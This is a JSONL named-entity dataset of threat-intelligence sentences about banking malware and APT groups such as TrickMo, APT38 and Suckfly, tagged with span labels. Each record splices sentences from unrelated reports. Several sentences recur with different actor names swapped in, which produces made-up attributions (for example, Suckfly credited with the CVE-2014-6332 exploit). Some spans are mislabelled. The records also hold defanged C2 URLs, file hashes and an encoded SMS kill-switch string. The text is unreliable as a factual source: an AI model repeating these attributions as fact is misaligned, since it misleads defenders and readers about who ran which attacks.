{"text": "Stealing and Concealing SMS Messages As some banks still use SMS-based transaction authorization , TrickMo is configured to automatically steal all SMS messages that are stored on the device . Like many such groups , PLATINUM seeks to steal sensitive intellectual property related to government interests , but its range of preferred targets is consistently limited to specific governmental organizations , defense institutes , intelligence agencies , diplomatic institutions , and telecommunication providers in South and Southeast Asia . During the past month , Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware , which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications .", "spans": [{"start": 99, "end": 106, "label": "Malware"}, {"start": 208, "end": 214, "label": "Organization"}, {"start": 217, "end": 225, "label": "Organization"}, {"start": 284, "end": 294, "label": "Organization"}, {"start": 378, "end": 404, "label": "Organization"}, {"start": 407, "end": 425, "label": "Organization"}, {"start": 428, "end": 449, "label": "Organization"}, {"start": 452, "end": 475, "label": "Organization"}, {"start": 482, "end": 509, "label": "Organization"}, {"start": 564, "end": 571, "label": "Organization"}, {"start": 622, "end": 632, "label": "Organization"}, {"start": 670, "end": 681, "label": "Malware"}, {"start": 682, "end": 689, "label": "Malware"}, {"start": 753, "end": 766, "label": "Malware"}, {"start": 784, "end": 786, "label": "System"}]}
{"text": "Once in a while , it sends a packet to its C & C server containing the collected device data along with all the saved SMS messages . LATINUM makes a concerted effort to hide their infection tracks , by self-deleting malicious components , or by using server side logic in ' one shot mode ' where remotely hosted malicious components are only allowed to load once . The email had no subject and what initially drew our attention to OilRig 's attack was the content of the spear phishing email .", "spans": [{"start": 133, "end": 140, "label": "Organization"}, {"start": 202, "end": 236, "label": "System"}, {"start": 251, "end": 268, "label": "System"}, {"start": 431, "end": 437, "label": "Organization"}]}
{"text": "Since it can use the accessibility service to become the default SMS app , it can also delete the SMS messages so only the attackers can see them . PLATINUM does not conduct its espionage activity to engage in direct financial gain , but instead uses stolen information for indirect economic advantages . As expected , OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East .", "spans": [{"start": 148, "end": 156, "label": "Organization"}, {"start": 283, "end": 291, "label": "Organization"}, {"start": 319, "end": 325, "label": "Organization"}]}
{"text": "In the image below , we can see a packet that was sent to the attacker \u2019 s C & C containing collected information along with stolen SMS data . PLATINUM uses a number of different custom-developed backdoors to communicate with infected computers . First identified in January 2015 , Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims .", "spans": [{"start": 143, "end": 151, "label": "Organization"}, {"start": 179, "end": 205, "label": "System"}]}
{"text": "A Communication Channel via Stolen SMS In addition , TrickMo has an automatic mechanism to send SMS messages to its C & C server . The lack of any significant evidence of shared code between any of these backdoor families is another clue as to the scope of the resources on which the activity group is able to draw , and the precautions the group is willing and able to take in order to avoid losing its ability to conduct its espionage operations . According to Symantec telemetry , almost 40 percent of Orangeworm 's confirmed victim organizations operate within the healthcare industry .", "spans": [{"start": 53, "end": 60, "label": "Malware"}, {"start": 284, "end": 298, "label": "Organization"}, {"start": 341, "end": 346, "label": "Organization"}, {"start": 463, "end": 471, "label": "Organization"}, {"start": 569, "end": 588, "label": "Organization"}]}
{"text": "In some cases , it uses this mechanism to send log data of important actions . PLATINUM has developed or commissioned a number of custom tools to provide the group with access to victim resources . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": [{"start": 79, "end": 87, "label": "Organization"}, {"start": 130, "end": 142, "label": "System"}, {"start": 314, "end": 331, "label": "Organization"}, {"start": 386, "end": 400, "label": "Indicator"}]}
{"text": "It can save an SMS message on the device , marking with \u201c internal \u201d in the phone number field . The updated tool has only been seen in a handful of victim computers within organizational networks in Southeast Asia\u2014PLATINUM is known to customize tools based on the network architecture of targeted organizations . Sowbug 's next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": [{"start": 314, "end": 320, "label": "Organization"}, {"start": 434, "end": 451, "label": "Organization"}, {"start": 506, "end": 520, "label": "Indicator"}]}
{"text": "The SMS message will be instantly sent to the server , informing the malware operator of executed tasks . The PLATINUM tool is , to our knowledge , the first malware sample observed to misuse chipset features in this way . For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug .", "spans": [{"start": 110, "end": 123, "label": "System"}, {"start": 158, "end": 165, "label": "System"}, {"start": 257, "end": 263, "label": "Organization"}, {"start": 316, "end": 333, "label": "Malware"}, {"start": 393, "end": 405, "label": "Indicator"}, {"start": 409, "end": 428, "label": "Indicator"}]}
{"text": "In the image below , we see a log TrickMo sent to the attacker upon becoming the default SMS app . The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives . In this case , the attackers maintained a presence on the target 's network for nearly six months between September 2016 and March 2017 .", "spans": [{"start": 34, "end": 41, "label": "Malware"}, {"start": 103, "end": 117, "label": "Organization"}, {"start": 287, "end": 297, "label": "Organization"}]}
{"text": "If the malware successfully became the default SMS app , it sends the words \u201c the app has been replaced \u201d in Russian . This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries . In other attacks , there was evidence that Felismus was installed using a tool known as Starloader ( detected by Symantec as Trojan.Starloader ) .", "spans": [{"start": 285, "end": 294, "label": "Organization"}, {"start": 299, "end": 323, "label": "Organization"}, {"start": 369, "end": 377, "label": "Malware"}, {"start": 414, "end": 424, "label": "Malware"}, {"start": 439, "end": 447, "label": "Organization"}, {"start": 451, "end": 468, "label": "Malware"}]}
{"text": "If the original SMS app has been restored , it will send \u201c the app returned to its original place. \u201d Controlling TrickMo TrickMo \u2019 s operators can control the malware via two channels : Through its C & C via a plaintext HTTP protocol using JSON objects Through encrypted SMS messages There are predefined commands to change the malware \u2019 s configuration and make it execute certain tasks . PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others .", "spans": [{"start": 113, "end": 120, "label": "Malware"}, {"start": 121, "end": 128, "label": "Malware"}, {"start": 390, "end": 402, "label": "Organization"}, {"start": 429, "end": 434, "label": "Organization"}, {"start": 496, "end": 506, "label": "Organization"}, {"start": 509, "end": 516, "label": "Organization"}, {"start": 519, "end": 527, "label": "Organization"}, {"start": 534, "end": 552, "label": "Organization"}, {"start": 607, "end": 617, "label": "Organization"}, {"start": 631, "end": 640, "label": "Organization"}, {"start": 645, "end": 665, "label": "Organization"}, {"start": 668, "end": 676, "label": "Organization"}, {"start": 699, "end": 715, "label": "Indicator"}, {"start": 728, "end": 743, "label": "Indicator"}, {"start": 746, "end": 763, "label": "Indicator"}, {"start": 770, "end": 785, "label": "Indicator"}]}
{"text": "Some of the more interesting commands include : SMS Control Update the address of the C & C server \u2014 SMS starting with \u201c http : // \u201d Send AES-encrypted SMS message back to sender \u2014 SMS starting with \u201c sms : // \u201d Update service wake-up interval \u2014 \u201c 2 \u201d Kill switch \u2014 \u201c 4 \u201d C & C Control Update the address of the C & C server \u2014 \u201c 1 \u201d Update service wake-up interval \u2014 \u201c 2 \u201d Lock the screen \u2014 \u201c 5 \u201d Display a picture in a WebView from an arbitrary URL \u2014 \u201c 11 \u201d Send an arbitrary SMS message \u2014 \u201c 8 \u201d Steal images But according to Gnosticplayers , his foray into a public marketplace like Dream has two goals --besides the first and obvious one being money . Additionally , Starloader was also observed deploying additional tools used by the attackers , such as credential dumpers and keyloggers .", "spans": [{"start": 670, "end": 680, "label": "Malware"}, {"start": 758, "end": 776, "label": "Malware"}, {"start": 781, "end": 791, "label": "Malware"}]}
{"text": "saved on the device \u2014 \u201c 12 \u201d and \u201c 13 \u201d Use the accessibility service to become the default SMS app \u2014 \u201c 6 \u201d Enable recording of other apps \u2014 \u201c 15 \u201d Kill switch \u2014 \u201c 4 \u201d The Lockdown Screen Most thieves don \u2019 t want to be caught red-handed as they steal \u2014 they want to buy some time to get away with the loot . However , CTU analysis indicates that GOLD LOWELL is motivated by financial gain , and there is no evidence of the threat actors using network access for espionage or data theft . ASERT has learned of an APT campaign , possibly originating from DPRK , we are calling STOLEN PENCIL that is targeting academic institutions since at least May 2018 .", "spans": [{"start": 319, "end": 322, "label": "Organization"}, {"start": 347, "end": 358, "label": "Organization"}, {"start": 489, "end": 494, "label": "Organization"}, {"start": 608, "end": 629, "label": "Organization"}]}
{"text": "The same is true for banking malware . The targeting of an organization rather than individuals , and the high ransom demands , made BitPaymer stand out from other contemporary ransomware at the time . Once gaining a foothold on a user 's system , the threat actors behind STOLEN PENCIL use Microsoft 's Remote Desktop Protocol ( RDP ) for remote point-and-click access .", "spans": [{"start": 133, "end": 142, "label": "System"}, {"start": 291, "end": 300, "label": "Organization"}, {"start": 304, "end": 327, "label": "System"}, {"start": 330, "end": 333, "label": "System"}]}
{"text": "Desktop banking malware often blocks the user \u2019 s access to their banking website after a successful transaction by using web injects that show a variety of \u201c service unavailable \u201d screens . Ransom demands have varied significantly , suggesting that INDRIK SPIDER likely calculates the ransom amount based on the size and value of the victim organization . The group uses an advanced piece of malware known as Remsec ( Backdoor.Remsec ) to conduct its attacks .", "spans": [{"start": 250, "end": 263, "label": "Organization"}, {"start": 410, "end": 416, "label": "Malware"}, {"start": 419, "end": 434, "label": "Malware"}]}
{"text": "TrickMo is no different ; the goal is to complete the operation while raising minimal suspicion . Since they were first identified in January 2-16 , this adversary has consistently targeted large organizations for high ransom demands . Strider has been active since at least October 2011 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 236, "end": 243, "label": "Organization"}]}
{"text": "After performing a fraudulent action , stealing the OTP/mTAN , TrickMo buys some time by activating the lock screen and preventing the user from accessing their device . The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud , through the use of webinjects and a malware distribution function . Lua modules is a technique that has previously been used by Flamer .", "spans": [{"start": 63, "end": 70, "label": "Malware"}, {"start": 174, "end": 188, "label": "System"}, {"start": 365, "end": 376, "label": "Malware"}]}
{"text": "This lockdown screen includes two parts : A WebView containing a background picture loaded from a predefined URL . Instead , OurMine had managed to alter WikiLeaks 's DNS records ( held by a third-party registrar ) to direct anyone who tried to visit wikileaks.org to visit a different IP address which definitely wasn't under the control of Julian Assange and his cronies . The Remsec malware used by Strider has a modular design .", "spans": [{"start": 125, "end": 132, "label": "Organization"}, {"start": 154, "end": 163, "label": "Organization"}, {"start": 379, "end": 385, "label": "Malware"}, {"start": 386, "end": 393, "label": "Malware"}, {"start": 402, "end": 409, "label": "Organization"}]}
{"text": "This background image likely contains a fake \u201c software update \u201d screen . Alternatively , OurMine might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . The group has maintained a low profile until now and its targets have been mainly organizations and individuals that would be of interest to a nation state 's intelligence services .", "spans": [{"start": 142, "end": 151, "label": "Organization"}, {"start": 155, "end": 167, "label": "Organization"}, {"start": 451, "end": 472, "label": "Organization"}]}
{"text": "A lockdown activity , which is a transparent window shown at the top of the screen that contains a \u201c loading \u201d cursor . Alternatively , the attackers might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . The group 's targets include a number of organizations and individuals located in Russia .", "spans": [{"start": 194, "end": 203, "label": "Organization"}, {"start": 207, "end": 219, "label": "Organization"}]}
{"text": "This screen persists on the screen and prevents the user from using the navigation buttons . The group 's primary goal is demonstrating to companies that they have weak security . Remsec uses a Lua interpreter to run Lua modules which perform various functions .", "spans": [{"start": 180, "end": 186, "label": "Malware"}, {"start": 194, "end": 209, "label": "Malware"}, {"start": 217, "end": 228, "label": "Malware"}]}
{"text": "Due to TrickMo \u2019 s persistence implementation mentioned earlier , this lockdown screen persists after a restart and is re-initiated every time the device becomes interactive . The ultimate goal of this threat is to mine Monero cryptocurrency in compromised Linux machines . Russia .", "spans": [{"start": 7, "end": 14, "label": "Malware"}]}
{"text": "In some cases , TrickMo may use this feature to intercept SMS messages without the knowledge of the user by activating the lockdown screen and intercepting SMS messages in the background . It is worth noting that during our investigation f-secure uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information .", "spans": [{"start": 16, "end": 23, "label": "Malware"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 479, "end": 486, "label": "Indicator"}]}
{"text": "Application Recording \u2014 Stealing OTPs and TANs The feature that makes TrickMo different from standard SMS stealers is its unique ability to record the screen when targeted apps are running . The tool then starts a new web browser instance on the attacker\u2019s system and submits credentials on the real VPN portal . the group 's targets include an organization in Sweden .", "spans": [{"start": 70, "end": 77, "label": "Malware"}, {"start": 246, "end": 256, "label": "Organization"}]}
{"text": "This feature was enabled only in newer versions of TrickMo that were tailored specifically for German banks and use a special application for implementing TAN-based 2FA . The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server . the group 's targets include an embassy in Belgium .", "spans": [{"start": 51, "end": 58, "label": "Malware"}, {"start": 258, "end": 275, "label": "System"}, {"start": 359, "end": 366, "label": "Organization"}]}
{"text": "The application recording is implemented via two methods : Using the Android MediaRecorder class to capture a video of the screen when the targeted application is presented to the user Using the accessibility service to save a text file containing the data of all the objects on the screen Both files are later sent to the C & C server of the attacker . First , the attacker\u2019s mission is to disrupt an operational process rather than steal data . Symantec will continue to search for more Remsec modules and targets in order to build upon our understanding of Strider and better protect our customers .", "spans": [{"start": 69, "end": 76, "label": "System"}, {"start": 366, "end": 376, "label": "Organization"}, {"start": 447, "end": 455, "label": "Organization"}, {"start": 489, "end": 503, "label": "Malware"}, {"start": 560, "end": 567, "label": "Organization"}]}
{"text": "In the following image , we can see how the malware receives a JSON object from the C & C server containing the command to start recording , the targeted apps and the recorded video size ratio . Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics . Another such an exceptional espionage platform is \" ProjectSauron , also known as \" Strider \" .", "spans": [{"start": 342, "end": 355, "label": "Organization"}, {"start": 464, "end": 477, "label": "Malware"}, {"start": 496, "end": 503, "label": "Organization"}]}
{"text": "In the image below , the function recursively collects all the text data from the child nodes of each accessibility node . The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . In September 2015 , our anti-targeted attack technologies caught a previously unknown attack .", "spans": [{"start": 127, "end": 142, "label": "Organization"}, {"start": 173, "end": 204, "label": "Organization"}, {"start": 207, "end": 210, "label": "Organization"}, {"start": 255, "end": 258, "label": "Organization"}, {"start": 402, "end": 410, "label": "Organization"}, {"start": 415, "end": 425, "label": "Organization"}]}
{"text": "In other words , it goes through every object on the screen and saves its text data . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016 .", "spans": [{"start": 90, "end": 95, "label": "Organization"}, {"start": 245, "end": 253, "label": "Organization"}, {"start": 258, "end": 268, "label": "Organization"}]}
{"text": "A TrickMo Kill Switch One of the most interesting features of the TrickMo malware is having its own kill switch . Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia . After getting the IP , the ProjectSauron component tries to communicate with the remote server using its own ( ProjectSauron ) protocol as if it was yet another C&C server .", "spans": [{"start": 2, "end": 9, "label": "Malware"}, {"start": 66, "end": 81, "label": "Malware"}, {"start": 122, "end": 134, "label": "Organization"}, {"start": 137, "end": 144, "label": "Organization"}, {"start": 151, "end": 158, "label": "Organization"}, {"start": 364, "end": 366, "label": "Indicator"}, {"start": 373, "end": 386, "label": "Malware"}, {"start": 457, "end": 470, "label": "Malware"}, {"start": 507, "end": 510, "label": "System"}]}
{"text": "Kill switches are used by many malware authors to remove traces from a device after a successful operation . APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . In a number of the cases we analyzed , ProjectSauron deployed malicious modules inside the custom network encryption 's software directory , disguised under similar filenames and accessing the data placed beside its own executable .", "spans": [{"start": 109, "end": 114, "label": "Organization"}, {"start": 155, "end": 174, "label": "Vulnerability"}, {"start": 183, "end": 199, "label": "System"}, {"start": 200, "end": 209, "label": "System"}, {"start": 316, "end": 329, "label": "Malware"}, {"start": 339, "end": 356, "label": "Malware"}]}
{"text": "Since TrickMo \u2019 s HTTP traffic with its C & C server is not encrypted , it can easily be tampered with . This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple Exfiltration methods .", "spans": [{"start": 18, "end": 22, "label": "Indicator"}, {"start": 150, "end": 158, "label": "System"}, {"start": 161, "end": 171, "label": "System"}, {"start": 174, "end": 183, "label": "System"}, {"start": 186, "end": 194, "label": "System"}, {"start": 209, "end": 214, "label": "Organization"}, {"start": 267, "end": 287, "label": "Organization"}, {"start": 476, "end": 489, "label": "Malware"}]}
{"text": "In the following image , we can see the function that parses the commands from the C & C server . The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network .", "spans": [{"start": 102, "end": 107, "label": "Organization"}, {"start": 162, "end": 182, "label": "Organization"}, {"start": 367, "end": 380, "label": "Organization"}, {"start": 425, "end": 450, "label": "Indicator"}, {"start": 456, "end": 479, "label": "Organization"}]}
{"text": "If the returned JSON object has the \u201c 4 \u201d key , it will turn on the kill switch and initiate its own removal by sending an intent and seamlessly confirming the uninstall using the accessibility service , all without the victim ever noticing anything . We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": [{"start": 364, "end": 369, "label": "Organization"}, {"start": 533, "end": 541, "label": "Organization"}, {"start": 612, "end": 620, "label": "Organization"}, {"start": 723, "end": 732, "label": "Organization"}]}
{"text": "The kill switch can also be turned on by SMS . APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . Secondary ProjectSauron modules are designed to perform specific functions like stealing documents , recording keystrokes , and hijacking encryption keys from both infected computers and attached USB sticks .", "spans": [{"start": 47, "end": 52, "label": "Organization"}, {"start": 216, "end": 224, "label": "Organization"}, {"start": 290, "end": 311, "label": "Malware"}]}
{"text": "This is a bit more complicated since the SMS commands are encrypted and encoded with base64 . APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet . activity originated from three separate IP addresses , all located in Chengdu , China .", "spans": [{"start": 94, "end": 99, "label": "Organization"}, {"start": 161, "end": 179, "label": "Organization"}, {"start": 369, "end": 371, "label": "Indicator"}]}
{"text": "The encryption algorithm used is RSA , and interestingly , the authors chose to use the private key for decryption and leave it in the code as a hardcoded string . APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . We don't know the exact date Suckfly stole the certificates from the South Korean organizations .", "spans": [{"start": 164, "end": 169, "label": "Organization"}, {"start": 182, "end": 190, "label": "Organization"}, {"start": 254, "end": 262, "label": "Organization"}, {"start": 339, "end": 347, "label": "Organization"}]}
{"text": "The image below shows the function that parses the SMS messages , decrypts them using the hardcoded RSA private key and executes the commands . APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . stolen certificates being used maliciously occurred in early 2014 .", "spans": [{"start": 144, "end": 149, "label": "Organization"}, {"start": 162, "end": 170, "label": "Organization"}, {"start": 284, "end": 292, "label": "Organization"}, {"start": 328, "end": 336, "label": "Organization"}]}
{"text": "Having analyzed a few variants of the malware , we noticed that the private key was exposed in the code and did not change . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . Symantec detects this threat as Backdoor.Nidiran .", "spans": [{"start": 145, "end": 150, "label": "Organization"}, {"start": 170, "end": 183, "label": "System"}, {"start": 403, "end": 411, "label": "Organization"}, {"start": 435, "end": 451, "label": "Indicator"}]}
{"text": "Therefore , our team managed to generate the public key and craft an SMS message that activated the kill switch . Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 319, "end": 326, "label": "Vulnerability"}, {"start": 335, "end": 378, "label": "System"}, {"start": 395, "end": 408, "label": "Vulnerability"}, {"start": 448, "end": 457, "label": "Organization"}, {"start": 458, "end": 465, "label": "System"}]}
{"text": "This means that the malware can be remotely eliminated by an SMS message . Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . The threat then executes \" svchost.exe \" .", "spans": [{"start": 127, "end": 132, "label": "Organization"}, {"start": 224, "end": 235, "label": "Malware"}]}
{"text": "Our team was also able to test other commands in the lab either by tampering with the HTTP traffic from the C & C or by sending crafted SMS messages . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer .", "spans": [{"start": 151, "end": 156, "label": "Organization"}, {"start": 197, "end": 216, "label": "Organization"}, {"start": 272, "end": 294, "label": "Organization"}, {"start": 337, "end": 349, "label": "Organization"}, {"start": 392, "end": 407, "label": "Indicator"}, {"start": 439, "end": 456, "label": "Malware"}, {"start": 470, "end": 488, "label": "Malware"}]}
{"text": "Suspect You \u2019 re Infected ? APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 74, "end": 93, "label": "Organization"}, {"start": 149, "end": 171, "label": "Organization"}, {"start": 210, "end": 217, "label": "Vulnerability"}, {"start": 238, "end": 245, "label": "Malware"}, {"start": 269, "end": 295, "label": "Malware"}, {"start": 330, "end": 334, "label": "Indicator"}]}
{"text": "The following SMS message can be used to kill the sample analyzed in this research and all other variants that use the same private key : HrLbpr3x/htAVnAgYepBuH2xmFDb68TYTt7FwGn0ddGlQJv/hqsctL57ocFU0Oz3L+uhLcOGG7GVBAfHKL1TBQ== Sending this SMS will trigger TrickMo \u2019 s kill switch by sending the string \u201c 4 \u201d encrypted with the generated RSA public key and base64 APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems . The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry .", "spans": [{"start": 257, "end": 264, "label": "Malware"}, {"start": 364, "end": 369, "label": "Organization"}, {"start": 491, "end": 513, "label": "Organization"}, {"start": 660, "end": 669, "label": "Organization"}, {"start": 689, "end": 733, "label": "Organization"}]}
{"text": "encoded . APT38 is a financially motivated group linked to North Korean cyber espionage operators , renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware . Blackfly began with a campaign to steal certificates , which were later used to sign malware used in targeted attacks .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 43, "end": 48, "label": "Organization"}, {"start": 72, "end": 97, "label": "Organization"}, {"start": 168, "end": 190, "label": "Organization"}, {"start": 237, "end": 245, "label": "Organization"}]}
{"text": "Indicators of Compromise ( IoCs ) hxxp : //mcsoft365.com/c hxxp : //pingconnect.net/c Hashes MD5 : 5c749c9fce8c41bf6bcc9bd8a691621b SHA256 : 284bd2d16092b4d13b6bc85d87950eb4c5e8cbba9af2a04d76d88da2f26c485c MD5 : b264af5d2f3390e465052ab502b0726d Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime . In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates .", "spans": [{"start": 34, "end": 85, "label": "Indicator"}, {"start": 99, "end": 131, "label": "Indicator"}, {"start": 141, "end": 205, "label": "Indicator"}, {"start": 212, "end": 244, "label": "Indicator"}, {"start": 288, "end": 293, "label": "Organization"}, {"start": 326, "end": 348, "label": "Organization"}, {"start": 470, "end": 478, "label": "Organization"}]}
{"text": "SHA256 : 8ab1712ce9ca2d7952ab763d8a4872aa6a278c3f60dc13e0aebe59f50e6e30f6 The TrickMo Factor The TrickBot Trojan was one of the most active banking malware strains in the cybercrime arena in 2019 . Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions . Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}, {"start": 78, "end": 85, "label": "Malware"}, {"start": 97, "end": 112, "label": "Malware"}, {"start": 211, "end": 216, "label": "Organization"}, {"start": 277, "end": 299, "label": "Organization"}]}
{"text": "From our analysis , it is apparent that TrickMo is designed to help TrickBot break the most recent methods of TAN-based authentication . APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time . The attacks targeted high-profile targets , including government and commercial organizations .", "spans": [{"start": 40, "end": 47, "label": "Malware"}, {"start": 68, "end": 76, "label": "Malware"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 222, "end": 244, "label": "Organization"}, {"start": 280, "end": 285, "label": "System"}, {"start": 387, "end": 397, "label": "Organization"}, {"start": 402, "end": 426, "label": "Organization"}]}
{"text": "One of the most significant features TrickMo possesses is the app recording feature , which is what gives TrickBot the ability to overcome the newer pushTAN app validations deployed by banks . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime . these attacks were part of a planned operation against specific targets in India .", "spans": [{"start": 37, "end": 44, "label": "Malware"}, {"start": 106, "end": 114, "label": "Malware"}, {"start": 255, "end": 260, "label": "Organization"}, {"start": 296, "end": 318, "label": "Organization"}]}
{"text": "SimBad : A Rogue Adware Campaign On Google Play March 13 , 2019 Check Point researchers from the Mobile Threat Team have discovered a new adware campaign on the Google Play Store . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 36, "end": 47, "label": "System"}, {"start": 64, "end": 75, "label": "Organization"}, {"start": 161, "end": 178, "label": "System"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 284, "end": 306, "label": "Organization"}, {"start": 483, "end": 499, "label": "Indicator"}]}
{"text": "This particular strain of Adware was found in 206 applications , and the combined download count has reached almost 150 million . Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": [{"start": 169, "end": 174, "label": "Organization"}, {"start": 289, "end": 311, "label": "Organization"}, {"start": 322, "end": 333, "label": "Organization"}, {"start": 524, "end": 540, "label": "Indicator"}]}
{"text": "Google was swiftly notified and removed the infected applications from the Google Play Store . APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of the fraudulent transactions from the victimized bank . The first known Suckfly campaign began in April of 2014 .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 75, "end": 86, "label": "System"}, {"start": 95, "end": 100, "label": "Organization"}, {"start": 111, "end": 118, "label": "System"}, {"start": 277, "end": 281, "label": "Organization"}]}
{"text": "Inside the SDK The malware resides within the \u2018 RXDrioder \u2019 Software Development Kit ( SDK ) , which is provided by \u2018 addroider [ . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities . Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India .", "spans": [{"start": 118, "end": 131, "label": "Indicator"}, {"start": 152, "end": 157, "label": "Organization"}, {"start": 274, "end": 281, "label": "Organization"}, {"start": 318, "end": 342, "label": "Organization"}, {"start": 356, "end": 387, "label": "Organization"}, {"start": 397, "end": 407, "label": "Organization"}]}
